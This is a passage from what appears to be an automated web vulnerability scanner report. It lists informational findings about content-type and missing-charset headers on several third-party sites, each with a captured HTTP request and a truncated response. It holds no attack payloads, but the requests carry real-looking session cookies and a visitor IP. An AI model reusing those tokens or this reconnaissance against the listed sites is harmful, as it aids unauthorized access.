Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=5781286.1303735972.2.2.utmgclid=CKbh46DPt6gCFcQSNAodRgFuBQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=5781286.184354172.1303732840.1303732840.1303735972.2; __utmc=5781286

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 6397
Content-Type: text/html; charset=utf-8
Server: DepthServ-FU/8.0
X-Powered-By: DepthScript.fu
Date: Mon, 25 Apr 2011 15:13:40 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<html>
<head>
<tit
...[SNIP]...
31.31. https://www.depthsecurity.com/services.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.depthsecurity.com
Path:   /services.aspx

Request

GET /services.aspx HTTP/1.1
Host: www.depthsecurity.com
Connection: keep-alive
Referer: https://www.depthsecurity.com/company.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=5781286.1303735972.2.2.utmgclid=CKbh46DPt6gCFcQSNAodRgFuBQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=5781286.184354172.1303732840.1303732840.1303735972.2; __utmc=5781286

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 6794
Content-Type: text/html; charset=utf-8
Server: DepthServ-FU/8.0
X-Powered-By: DepthScript.fu
Date: Mon, 25 Apr 2011 15:13:40 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<html>
<head>
<tit
...[SNIP]...
31.32. https://www.fusionvm.com/FusionVM/DesktopDefault.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.fusionvm.com
Path:   /FusionVM/DesktopDefault.aspx

Request

GET /FusionVM/DesktopDefault.aspx HTTP/1.1
Host: www.fusionvm.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQQQASDQQ=MNOLHEFCGKBHGOHLANCBPEKB; CriticalWatch_WinMgmt=1ea476ea-f298-43b7-b986-76b4c2ad1a2b; ASP.NET_SessionId=ldofgy3miecclj01ixxgal4x

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Mon, 25 Apr 2011 12:54:54 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Date: Mon, 25 Apr 2011 12:54:53 GMT
Content-Length: 33838


<html>
<head id="htmlHead">
</head>
<body onload="sClock();">
<form method="post" action="DesktopDefault.aspx" id="ctl00">
<div class="aspNetHidden">
<input type="hidden" name="__EVENTTARGET"
...[SNIP]...
31.33. https://www.manageengine.com/network-performance-management.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.manageengine.com
Path:   /network-performance-management.html

Request

GET /network-performance-management.html HTTP/1.1
Host: www.manageengine.com
Connection: keep-alive
Referer: https://store.manageengine.com/service-desk/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208542606.1303732848.2.2.utmgclid=CL-9_6TPt6gCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=208542606.1253035426.1303526945.1303526945.1303732848.2; __utmc=208542606; __utmb=208542606.13.10.1303732848

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:15:18 GMT
Server: Apache
Last-Modified: Thu, 24 Mar 2011 09:27:38 GMT
ETag: "b11e-49f3716993680"
Accept-Ranges: bytes
Cache-Control: max-age=-2170060
Expires: Thu, 31 Mar 2011 09:27:38 GMT
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 45342

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
31.34. https://www.manageengine.com/products/security-manager/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.manageengine.com
Path:   /products/security-manager/index.html

Request

GET /products/security-manager/index.html HTTP/1.1
Host: www.manageengine.com
Connection: keep-alive
Referer: https://store.manageengine.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208542606.1303732848.2.2.utmgclid=CL-9_6TPt6gCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=208542606.1253035426.1303526945.1303526945.1303732848.2; __utmc=208542606; __utmb=208542606.10.10.1303732848

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:13:51 GMT
Server: Apache
Last-Modified: Wed, 23 Mar 2011 11:51:49 GMT
ETag: "d3ec-49f24fc659f40"
Accept-Ranges: bytes
Cache-Control: max-age=-2247722
Expires: Wed, 30 Mar 2011 11:51:49 GMT
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 54252

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><!-- Instan
...[SNIP]...
31.35. https://www.manageengine.com/products/security-manager/security-manager-forum.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.manageengine.com
Path:   /products/security-manager/security-manager-forum.html

Request

GET /products/security-manager/security-manager-forum.html HTTP/1.1
Host: www.manageengine.com
Connection: keep-alive
Referer: https://www.manageengine.com/products/security-manager/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208542606.1303732848.2.2.utmgclid=CL-9_6TPt6gCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=208542606.1253035426.1303526945.1303526945.1303732848.2; __utmc=208542606; __utmb=208542606.12.10.1303732848

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:13:52 GMT
Server: Apache
Last-Modified: Mon, 21 Feb 2011 10:23:28 GMT
ETag: "256-49cc841318800"
Accept-Ranges: bytes
Cache-Control: max-age=-4845024
Expires: Mon, 28 Feb 2011 10:23:28 GMT
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 598

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
31.36. https://www.trust-guard.com/Templates/New-Green/Images/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.trust-guard.com
Path:   /Templates/New-Green/Images/favicon.ico

Request

GET /Templates/New-Green/Images/favicon.ico HTTP/1.1
Host: www.trust-guard.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=6qd9acevi2gacre2qugrcn54a3; __utmz=147269874.1303748966.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=147269874.1166530582.1303748966.1303748966.1303748966.1; __utmc=147269874; __utmb=147269874.6.10.1303748966

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 16:30:50 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sat, 04 Sep 2010 00:48:34 GMT
ETag: "3ff07b6-47e-48f64682b1c80"
Accept-Ranges: bytes
Content-Length: 1150
Connection: close
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... .....................................................III.AAA.................................................www.#"#.Ks:.Hn6.....UUU...............................
...[SNIP]...
32. Multiple content types specified  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://system.netsuite.com
Path:   /javascript/NLPortal.jsp__z=f4d6ccdb90.nlqs

Issue detail

The response contains multiple Content-type statements which are incompatible with one another. The following statements were received:

Request

GET /javascript/NLPortal.jsp__z=f4d6ccdb90.nlqs HTTP/1.1
Host: system.netsuite.com
Connection: keep-alive
Referer: https://system.netsuite.com/pages/customerlogin.jsp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bn_u=6923519460848807096; mbox=session#1303736347554-914602#1303744342|PC#1303736347554-914602.17#1366814482|check#true#1303742542

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:48:32 GMT
Server: Apache
Expires: Tue, 26 Apr 2011 06:15:32 GMT
Last-Modified: Fri, 22 Apr 2011 00:09:09 GMT
NS_RTIMER_COMPOSITE: 239240273:616363742D6A6176613037392E7376616C652E6E65746C65646765722E636F6D:80
encoding: UTF-8
Content-Language: UTF-8
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=969
Connection: Keep-Alive
Content-Type: text/javascript; charset=UTF-8
Content-Length: 4552


function getQueryParameter(param)
{
var idx = document.URL.indexOf(param+"=");
if (idx != -1)
{
var sidx = idx+param.length+1;
var len = document.URL.substring(sidx).indexOf("&"
...[SNIP]...
</title><meta http-equiv='Content-Type' content='text/html; charset=utf-8'>"+
            "<link rel='stylesheet' href='/core/styles/pagestyles.nl?ct=0&bglt=F2F4F6&bgmd=E0E4E8&bgdk=737A82&bgon=C1C8D2&bgoff=8492A5&bgbar=C1C8D2&tasktitletext=000000&crumbtext=000000&headertext=000000&
...[SNIP]...
33. HTML does not specify charset  previous  next
There are 117 instances of this issue:

33.1. https://customer.kronos.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://customer.kronos.com
Path:   /

Request

GET / HTTP/1.1
Host: customer.kronos.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1306330437105%26vn%3D1; __utmz=137648623.1303738437.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); KronosCust=LogIn=false; ASPSESSIONIDQASQRRDR=CIMMPBCACECLKFBLHGMAAPIL; ICRedirect=Url=; Visitor=173%2E193%2E214%2E243; mbox=session#1303738433760-48782#1303742829|check#true#1303741029; s_cc=true; s_nr=1303740970638; s_invisit=true; s_lv=1303740970641; s_lv_s=First%20Visit; s_gpv_page=kronos%3Alabor-analysis%3Alabor-analysis-software.aspx; s_sq=%5B%5BB%5D%5D; __utma=137648623.1117815011.1303738437.1303738437.1303738437.1; __utmc=137648623; __utmb=137648623.9.10.1303738437

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:16:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 17287
Content-Type: text/html
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Set-Cookie: ICRedirect=Url=; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<SCRIPT language="JavaScript">
<!--

function verify(url) {
if (confirm("Are you sure?")) {
window.location = url;
}

...[SNIP]...
</title>

<meta http-equiv="Content-Type" content="text/html;">
<link rel="stylesheet" href="/includes/local.css" type="text/css">
...[SNIP]...
33.2. https://customer.kronos.com/Default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://customer.kronos.com
Path:   /Default.asp

Request

GET /Default.asp HTTP/1.1
Host: customer.kronos.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1306330437105%26vn%3D1; __utmz=137648623.1303738437.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=session#1303738433760-48782#1303740624|check#true#1303738824; s_cc=true; s_nr=1303738765059; s_invisit=true; s_lv=1303738765060; s_lv_s=First%20Visit; s_gpv_page=kronos%3Acustomer-support-login.aspx; s_sq=%5B%5BB%5D%5D; __utma=137648623.1117815011.1303738437.1303738437.1303738437.1; __utmc=137648623; __utmb=137648623.3.10.1303738437; KronosCust=LogIn=false; ASPSESSIONIDQASQRRDR=CIMMPBCACECLKFBLHGMAAPIL

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:39:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 17287
Content-Type: text/html
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Set-Cookie: ICRedirect=Url=; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<SCRIPT language="JavaScript">
<!--

function verify(url) {
if (confirm("Are you sure?")) {
window.location = url;
}

...[SNIP]...
</title>

<meta http-equiv="Content-Type" content="text/html;">
<link rel="stylesheet" href="/includes/local.css" type="text/css">
...[SNIP]...
33.3. https://customer.kronos.com/portalproblems.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://customer.kronos.com
Path:   /portalproblems.asp

Request

GET /portalproblems.asp HTTP/1.1
Host: customer.kronos.com
Connection: keep-alive
Referer: https://customer.kronos.com/user/logindenied.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1306330437105%26vn%3D1; __utmz=137648623.1303738437.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); KronosCust=LogIn=false; ASPSESSIONIDQASQRRDR=CIMMPBCACECLKFBLHGMAAPIL; ICRedirect=Url=; mbox=session#1303738433760-48782#1303741379|check#true#1303739579; s_cc=true; s_nr=1303739518621; s_invisit=true; s_lv=1303739518623; s_lv_s=First%20Visit; s_gpv_page=kronos; s_sq=%5B%5BB%5D%5D; __utma=137648623.1117815011.1303738437.1303738437.1303738437.1; __utmc=137648623; __utmb=137648623.8.10.1303738437; Visitor=173%2E193%2E214%2E243

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:52:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 11576
Content-Type: text/html
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<SCRIPT language="JavaScript">
<!--

function verify(url) {
if (confirm("Are you sure?")) {
window.location = url;
}

...[SNIP]...
</title>

<meta http-equiv="Content-Type" content="text/html;">
<link rel="stylesheet" href="/includes/local.css" type="text/css">
...[SNIP]...
33.4. https://customer.kronos.com/user/forgotpassword.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://customer.kronos.com
Path:   /user/forgotpassword.asp

Request

GET /user/forgotpassword.asp HTTP/1.1
Host: customer.kronos.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1306330437105%26vn%3D1; __utmz=137648623.1303738437.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); KronosCust=LogIn=false; ASPSESSIONIDQASQRRDR=CIMMPBCACECLKFBLHGMAAPIL; ICRedirect=Url=; mbox=session#1303738433760-48782#1303741379|check#true#1303739579; s_cc=true; s_nr=1303739518621; s_invisit=true; s_lv=1303739518623; s_lv_s=First%20Visit; s_gpv_page=kronos; s_sq=%5B%5BB%5D%5D; __utma=137648623.1117815011.1303738437.1303738437.1303738437.1; __utmc=137648623; __utmb=137648623.8.10.1303738437

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:51:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 13005
Content-Type: text/html
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Set-Cookie: Visitor=173%2E193%2E214%2E243; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<SCRIPT language="JavaScript">
<!--

function verify(url) {
if (confirm("Are you sure?")) {
window.location = url;
}

...[SNIP]...
</title>

<meta http-equiv="Content-Type" content="text/html;">
<link rel="stylesheet" href="/includes/local.css" type="text/css">
...[SNIP]...
33.5. https://customer.kronos.com/user/forgotusername.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://customer.kronos.com
Path:   /user/forgotusername.asp

Request

GET /user/forgotusername.asp HTTP/1.1
Host: customer.kronos.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1306330437105%26vn%3D1; __utmz=137648623.1303738437.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); KronosCust=LogIn=false; ASPSESSIONIDQASQRRDR=CIMMPBCACECLKFBLHGMAAPIL; ICRedirect=Url=; mbox=session#1303738433760-48782#1303741379|check#true#1303739579; s_cc=true; s_nr=1303739518621; s_invisit=true; s_lv=1303739518623; s_lv_s=First%20Visit; s_gpv_page=kronos; s_sq=%5B%5BB%5D%5D; __utma=137648623.1117815011.1303738437.1303738437.1303738437.1; __utmc=137648623; __utmb=137648623.8.10.1303738437; Visitor=173%2E193%2E214%2E243

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:51:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 13247
Content-Type: text/html
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Set-Cookie: Visitor=173%2E193%2E214%2E243; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<SCRIPT language="JavaScript">
<!--

function verify(url) {
if (confirm("Are you sure?")) {
window.location = url;
}

...[SNIP]...
</title>
       <meta http-equiv="Content-Type" content="text/html;">
       <link rel="stylesheet" href="/includes/local.css" type="text/css">
...[SNIP]...
33.6. https://customer.kronos.com/user/logindenied.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://customer.kronos.com
Path:   /user/logindenied.asp

Request

GET /user/logindenied.asp HTTP/1.1
Host: customer.kronos.com
Connection: keep-alive
Referer: https://customer.kronos.com/Default.asp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1306330437105%26vn%3D1; __utmz=137648623.1303738437.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); KronosCust=LogIn=false; ASPSESSIONIDQASQRRDR=CIMMPBCACECLKFBLHGMAAPIL; ICRedirect=Url=; mbox=session#1303738433760-48782#1303741379|check#true#1303739579; s_cc=true; s_nr=1303739518621; s_invisit=true; s_lv=1303739518623; s_lv_s=First%20Visit; s_gpv_page=kronos; s_sq=%5B%5BB%5D%5D; __utma=137648623.1117815011.1303738437.1303738437.1303738437.1; __utmc=137648623; __utmb=137648623.8.10.1303738437; Visitor=173%2E193%2E214%2E243

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:51:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 16169
Content-Type: text/html
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Set-Cookie: Visitor=173%2E193%2E214%2E243; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<SCRIPT language="JavaScript">
<!--

function verify(url) {
if (confirm("Are you sure?")) {
window.location = url;
}

...[SNIP]...
</TITLE>

<META http-equiv="Content-Type" content="text/html;">
<LINK rel="stylesheet" href="/includes/local.css" type="text/css">
...[SNIP]...
33.7. http://duckduckgo.com/post.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://duckduckgo.com
Path:   /post.html

Request

GET /post.html HTTP/1.1
Host: duckduckgo.com
Proxy-Connection: keep-alive
Referer: http://duckduckgo.com/?q=site%3Axss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
If-Modified-Since: Wed, 02 Feb 2011 02:38:43 GMT

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 15:39:07 GMT
Content-Type: text/html
Last-Modified: Wed, 17 Nov 2010 08:17:05 GMT
Connection: keep-alive
Expires: Tue, 26 Apr 2011 15:39:07 GMT
Cache-Control: max-age=86400
Content-Length: 350

<html>
<body>
<script type="text/JavaScript">
function post(e) {
if(e.source==parent && e.origin == location.protocol+'//'+location.hostname)
parent.location.href=e.data;
}

if (window.addEventLis
...[SNIP]...
33.8. https://employer.unicru.com/asp/home/login.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://employer.unicru.com
Path:   /asp/home/login.asp

Request

GET /asp/home/login.asp HTTP/1.1
Host: employer.unicru.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:39:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
webservername: 42vm
Content-Length: 3592
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSSRCBTSB=MCAKPIJCNPCBKCIMDMJHBHMD; path=/
Cache-control: private
Set-Cookie: KTMDWestLB=993264394.20736.0000; path=/


<html>
   <head>
       <title>Unicru: Employer's Desktop Log In</title>
       <style type="text/css">
       <!--
       .content {FONT-WEIGHT: normal; FONT-SIZE: 11px; COLOR: #666666; FONT-FAMILY: verdana, san-
...[SNIP]...
33.9. http://foreign.dt00.net/zones/zone1.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://foreign.dt00.net
Path:   /zones/zone1.php

Request

GET /zones/zone1.php?country=4&region=0 HTTP/1.1
Host: foreign.dt00.net
Proxy-Connection: keep-alive
Referer: http://foreign.dt00.net/foreign/top.php?site=3&cat=30&red=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:02 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=20
Content-Length: 313


document.write('<a href="http://foreign.dt00.net/click.php?id=308&amp;zone=1&amp;country=4" target="_blank"><img src="http://img.dt00.net/foreign/166.gif" alt=".................." border="0" /></a><i
...[SNIP]...
33.10. http://foreign.dt00.net/zones/zone23.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://foreign.dt00.net
Path:   /zones/zone23.php

Request

GET /zones/zone23.php?country=4&region=0 HTTP/1.1
Host: foreign.dt00.net
Proxy-Connection: keep-alive
Referer: http://www.marketgid.com/pnews/773204/i/7269/pp/2/1/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:32:50 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=20
Content-Length: 502


document.write('<ul class="hmenu-1 clearfix hmactive-5 mt"><li class="tm-5"><span>......................</span></li></ul> <div class="l-block">');document.write('<a href="http://foreign.dt00.net/cli
...[SNIP]...
33.11. http://foreign.dt00.net/zones/zone25.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://foreign.dt00.net
Path:   /zones/zone25.php

Request

GET /zones/zone25.php?country=4&region=0 HTTP/1.1
Host: foreign.dt00.net
Proxy-Connection: keep-alive
Referer: http://foreign.dt00.net/foreign/doping.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:03 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=20
Content-Length: 644


